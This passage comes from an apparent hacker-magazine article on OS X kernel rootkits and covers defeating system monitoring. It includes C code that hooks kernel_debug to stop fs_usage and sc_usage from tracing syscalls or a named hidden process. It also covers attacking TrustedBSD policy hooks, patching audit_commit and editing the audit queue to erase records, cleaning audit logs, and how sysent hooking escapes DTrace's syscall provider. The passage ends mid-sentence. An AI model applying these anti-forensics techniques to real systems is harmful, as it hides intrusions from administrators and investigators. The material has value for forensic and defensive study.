KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE, BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_START, (int)(*ip), (int)(*(ip+1)), (int)(*(ip+2)), (int)(*(ip+3)), 0); (...) error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0])); (...) KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE, BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_END, error, uthread->uu_rval[0], uthread->uu_rval[1], p->p_pid, 0); (...) The easiest way to disable tracing of BSD related functions (besides patching kernel_debug to just return) is to modify the calls to kernel_debug() and reroute them to our own function. The disassembler makes this extremely easy, so much that I implemented code for each call to kernel_debug() to have its own trampoline (there is really no need for such thing!). Sample function to disable all BSD syscall traces: void tfc_kernel_debug(uint32_t debugid, uintptr_t arg1, uintptr_t arg2, uintptr_t arg3, uintptr_t arg4, __unused uintptr_t arg5) { // solve the symbol of the original function static void (*_kernel_debug)(uint32_t debugid, uintptr_t arg1, uintptr_t arg2, uintptr_t arg3, uintptr_t arg4, __unused uintptr_t arg5) = NULL; if (_kernel_debug == NULL) _kernel_debug = (void*)solve_kernel_symbol(&g_kernel_info, "_kernel_debug"); // do not let fs_usage/sc_usage trace any BSD* system calls if ( (debugid >> 24) == DBG_BSD) return; else _kernel_debug(debugid, arg1, arg2, arg3, arg4, 0); } This patch will be suspicious when fs_usage and/or sc_usage are used because no BSD system calls will be traced and screen output will be very low. kdebug's implementation poses some problems to distinguish between cases to hide or not. Its buffers are very small and this is easily noticed if you peak at fs_usage or sc_usage code (verify the lookup() [bsd/vfs/vfs_lookup.c] kernel function to see how fs_usage gets the path name for syscalls such as open()). Fortunately for us there is a easy way to accomplish this using current_proc() - it returns a proc structure for the currently executing process. With this information we can retrieve the process name from the proc structure (p_comm field, max size 16) and match against the processes we do not want traced. A code snippet for a simple check to hide vmware-tools-daemon: struct proc *p = current_proc(); // MAXCOMLEN == 16, we could hash always to MAXCOMLEN to avoid strlen call uint32_t hash = hash_name(&p->p_comm[0], strlen(&p->p_comm[0])); static uint32_t hidehash = 0; if (hidehash == 0) hidehash = hash_name("vmware-tools-daemon", MAXCOMLEN); if (hash == hidehash ) return; else _kernel_debug(debugid, arg1, arg2, arg3, arg4, 0); The basic blocks to override kdebug are presented, implementation details are left to the attached sample code and to you. One final word of caution. The interception of Mach syscalls at kdebug gives some problems and the hooking is very unstable (read kernel panics). This is particularly exacerbated with the zombies rootkit feature later described. The attached code has been written to support that feature but at time of writing I still had no time to research the Mach problem - the code just ignores that class. ------[ 6.2.3 - TrustedBSD TrustedBSD is a project that started in FreeBSD and was ported to OS X in Leopard. It enables a series of (interesting) security features, the most famous one being the OS X/iOS sandbox. Its implementation is done by adding "hooks" in critical kernel functions. Policy modules can be written to receive events from these "hooks" and act on them if necessary/desirable. One easy application is to create a runtime file system checker for critical folders. The app monitors LaunchDaemons and notify the user if a new file was added in there, which is a not so frequent operation and a favourite spot for malware to make itself persistent (oh, this was a good opportunity to use APT buzzword!). It can be used for evil purposes - the same "hooks" can increase privileges or hide files [25]. Using an example with the open syscall (to be used later with in Kauth section): open() -> open_nocancel() -> open1() | v vn_open_auth() -> vn_authorize_open_existing() | v mac_vnode_check_open() | v MAC_CHECK() | v call policy, if registered The vnode check handler that we can install has the following prototype: typedef int mpo_vnode_check_open_t( kauth_cred_t cred, struct vnode *vp, struct label *label, int acc_mode); Our handler will receive a pointer to the vnode structure and make it possible to dump the filename and even transverse the full path (remember that vnodes exist in a linked list). MAC_CHECK() is a macro that will route the request to the policy modules. It is a bit like sysent table where there is a list called mac_policy_list that holds function pointers. A presentation by Andrew Case on Mac memory forensics [26] analyses how to find malicious TrustedBSD modules using this list against a sample I created (rex the wonder dog). It is worth to check his slides for other Mac memory forensics tips. The available policy checks can be found at bsd/security/mac_framework.h, and their implementation is in the different source files in the same folder. What interests us is that mac_* functions are always called so there is a point of entry that can be used. The mac_* functions contain all the necessary/available information since they are the ones always calling and passing the parameters to the policy modules via MAC_CHECK() macro. To attack this we can use the same old story: hook those functions, or attack the mac_policy_list using the syscall handler concept, or something else. When loading the rootkit it might also be useful to lookup the policy list to verify if there is anything else installed other than default modules. The system owner might be a bit smarter than the vast majority ;-). ------[ 6.2.4 - Auditing - Basic Security Module The auditing features available from the Basic Security Module Implementation are not really instrumentation but since their purpose is to track user and process actions we should be interested in understanding and tweak them to our evil purposes. Auditing is not fully enabled by default due to its (potentially) considerable performance hit and disk space usage (oh, I miss those PCI-DSS meetings). To modify its configuration you need to edit /etc/security/audit_control. The two interesting fields are flags and naflags (flags for events that can be matched to a user, naflags for those who can't). Event classes are defined in /etc/security/audit_class (description can be found at [27] and [28]). For example, if "pc" class is configured audit will log exec() and its arguments. Let's move to what really matters for us, evil stuff! Auditing is implemented with macros [bsd/security/audit/audit.h] inside BSD and Mach system calls (and some other places). The following code snippet is from unix_syscall64 implementation, where entry and exit macros are placed before the syscall function to be executed is called: AUDIT_SYSCALL_ENTER(code, p, uthread); error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0])); AUDIT_SYSCALL_EXIT(code, p, uthread, error); About the contents of entry macro: /* * audit_syscall_enter() is called on entry to each system call. It is * responsible for deciding whether or not to audit the call * (preselection), and if so, allocating a per-thread audit record. * audit_new() will fill in basic thread/credential properties. */ The exit macro is the interesting one because it calls audit_syscall_exit(): /* * audit_syscall_exit() is called from the return of every system call, or * in the event of exit1(), during the execution of exit1(). It is * responsible for committing the audit record, if any, along with return * condition. */ When committed, the audit record will be added to an audit queue and removed from the user thread structure (struct uthread, field uu_ar [bsd/sys/user.h]). void audit_syscall_exit(unsigned int code, int error, __unused proc_t proc, struct uthread *uthread) { (...) audit_commit(uthread->uu_ar, error, retval); out: uthread->uu_ar = NULL; } The commit function: void audit_commit(struct kaudit_record *ar, int error, int retval) { (..) TAILQ_INSERT_TAIL(&audit_q, ar, k_q); // add to queue audit_q_len++; audit_pre_q_len--; cv_signal(&audit_worker_cv); // signal worker who commits to disk mtx_unlock(&audit_mtx); } By default in OS X, almost everything is disabled excepting logging and authentication to obtain higher privileges. The command "praudit /dev/auditpipe" (as root, of course) can be used to live audit events. Run the command and login via ssh, or lock and unlock the console to see these events. Syscall exit or audit commit functions can be temporarily patched to test if they are the right places, and yes they are. Removing the call to audit_commit() or patching it with a ret removes any trace of audit events in logs. There are four references to commit in OS X 10.8.2 (3 calls, 1 jump): - audit_syscall_exit - audit_mach_syscall_exit - audit_proc_coredump - audit_session_event To have granular control over the auditing process is a bit more complicated. There is not always enough information available to distinguish between the cases we want to hide at audit_commit(). For example, if process auditing is enabled, the fork1() function calls audit like this: AUDIT_ARG(pid, child_proc->p_pid); This will call the function responsible to set the audit record field: void audit_arg_pid(struct kaudit_record *ar, pid_t pid) { ar->k_ar.ar_arg_pid = pid; ARG_SET_VALID(ar, ARG_PID); } The problem here is that we do not have (yet) enough information about this fork; we are not sure (yet) if it is the process we want to hide or some other process. A different tactic must be used! Because there is an events queue we can hijack the worker responsible for those commits to disk, audit_worker() [bsd/security/audit/audit_worker.c]. The missing piece is how to correlate all events we are interested in. Luckily for us (and the auditor in particular) there is a session id in audit record structure [bsd/security/audit/audit_private.h]: pid_t ar_subj_asid; /* Audit session ID */ With this information we just need to hold the queue commit to disk until enough information to find the correct session ID is available. When we have it we can edit the queue and remove all the entries that match that session ID. Last but not least, there is a critical task left! Auditing logs must be cleaned in case auditing was already properly configured. The bad news is that you will have to do this dirty work yourself. Do not forget that the logs are in binary format and OpenBSM's source at [29] can be helpful (praudit outputs XML format so it might be a good starting point). ------[ 6.2.5 - DTrace DTrace is a fantastic dynamic tracing framework introduced by Sun in Solaris and available in Mac OS X since Leopard. It can be used to trace in real-time almost every corner of kernel and user processes with minimum performance impact. An experienced system administrator can use its power to assist in discovering strange (aka malicious) behaviour. There are different providers that can trace almost every function entry and exit, BSD syscalls and Mach traps, specific process, virtual memory, and so on. The two most powerful providers against rootkits are syscall and fbt (function boundary). We will see how they are implemented and how to modify them to hide rootkit activity. A good design and implementation overview is provided by [23] (Google is your friend) and usage guide at [24]. ------[ 6.2.5.1 - syscall provider This provider allows to trace every BSD system call entry and return (the provider for Mach traps is mach_trap). A quick example that prints the path argument being passed to the open() syscall: # dtrace -n 'syscall::open:entry { printf("opening %s", copyinstr(arg0)); }' dtrace: description 'syscall::open:entry' matched 1 probe CPU ID FUNCTION:NAME 0 119 open:entry opening /dev/dtracehelper 0 119 open:entry opening /usr/share/terminfo/78/xterm-256color 0 119 open:entry opening /dev/tty 0 119 open:entry opening /etc/pf.conf The syscall provider is useful to detect syscall handler manipulation but not the function pointers modification at sysent table. To understand why let's delve into its implementation. This provider is implemented by rewriting the system call table when a probe is enabled, which in practice is the same operation as sysent hooking. The interesting source file is bsd/dev/dtrace/systrace.c. It contains a global pointer called systrace_sysent - a DTrace related structure that will hold the original system call pointer and some other info. Things start happening at systrace_provide(). Here systrace_sysent is allocated and all necessary information copied from the original sysent table (systrace_init). Then internal DTrace probe information is added. DTrace's philosophy is of zero probe effect when disabled so there are functions that replace and restore the sysent table entries. There is a struct called dtrace_pops_t which contains provider's operations. Syscall provider has the following: static dtrace_pops_t systrace_pops = { systrace_provide, NULL, systrace_enable, systrace_disable, NULL, NULL, NULL, systrace_getarg, NULL, systrace_destroy }; systrace_enable() will modify sysent function pointers and redirect them to dtrace_systrace_syscall(). Code snippet responsible for this: (...) lck_mtx_lock(&dtrace_systrace_lock); if (sysent[sysnum].sy_callc == systrace_sysent[sysnum].stsy_underlying) { vm_offset_t dss = (vm_offset_t)&dtrace_systrace_syscall; ml_nofault_copy((vm_offset_t)&dss, (vm_offset_t)&sysent[sysnum].sy_callc, sizeof(vm_offset_t)); } lck_mtx_unlock(&dtrace_systrace_lock); (...) Attaching a kernel debugger and inserting a breakpoint on systrace_enable() confirms this (keep in mind all these values include ASLR slide of 0x24a00000): Before: gdb$ print *(struct sysent*)(0xffffff8025255840+5*sizeof(struct sysent)) $12 = { sy_narg = 0x3, sy_resv = 0x0, sy_flags = 0x0, sy_call = 0xffffff8024cfc210, <- open syscall, sysent[5] sy_arg_munge32 = 0xffffff8024fe34f0, sy_arg_munge64 = 0, sy_return_type = 0x1, sy_arg_bytes = 0xc } dtrace_systrace_syscall is located at address 0xFFFFFF8024FDC630. After enabling a 'syscall::open:entry' probe: gdb$ print *(struct sysent*)(0xffffff8025255840+5*sizeof(struct sysent)) $13 = { sy_narg = 0x3, sy_resv = 0x0, sy_flags = 0x0, sy_call = 0xffffff8024fdc630, <- now points to dtrace_systrace_syscall sy_arg_munge32 = 0xffffff8024fe34f0, sy_arg_munge64 = 0, sy_return_type = 0x1, sy_arg_bytes = 0xc } To recall DTrace's flow: User Kernel open() -|-> unix_syscall64() -> dtrace_systrace_syscall -> open() syscall What are the conclusions from all this? If only the sysent table function pointers are modified by the rootkit, DTrace will be unable to directly detect the rootkit using syscall provider. The modified pointer will be copied by DTrace and return to it. DTrace is blind to the original function because it does not exist an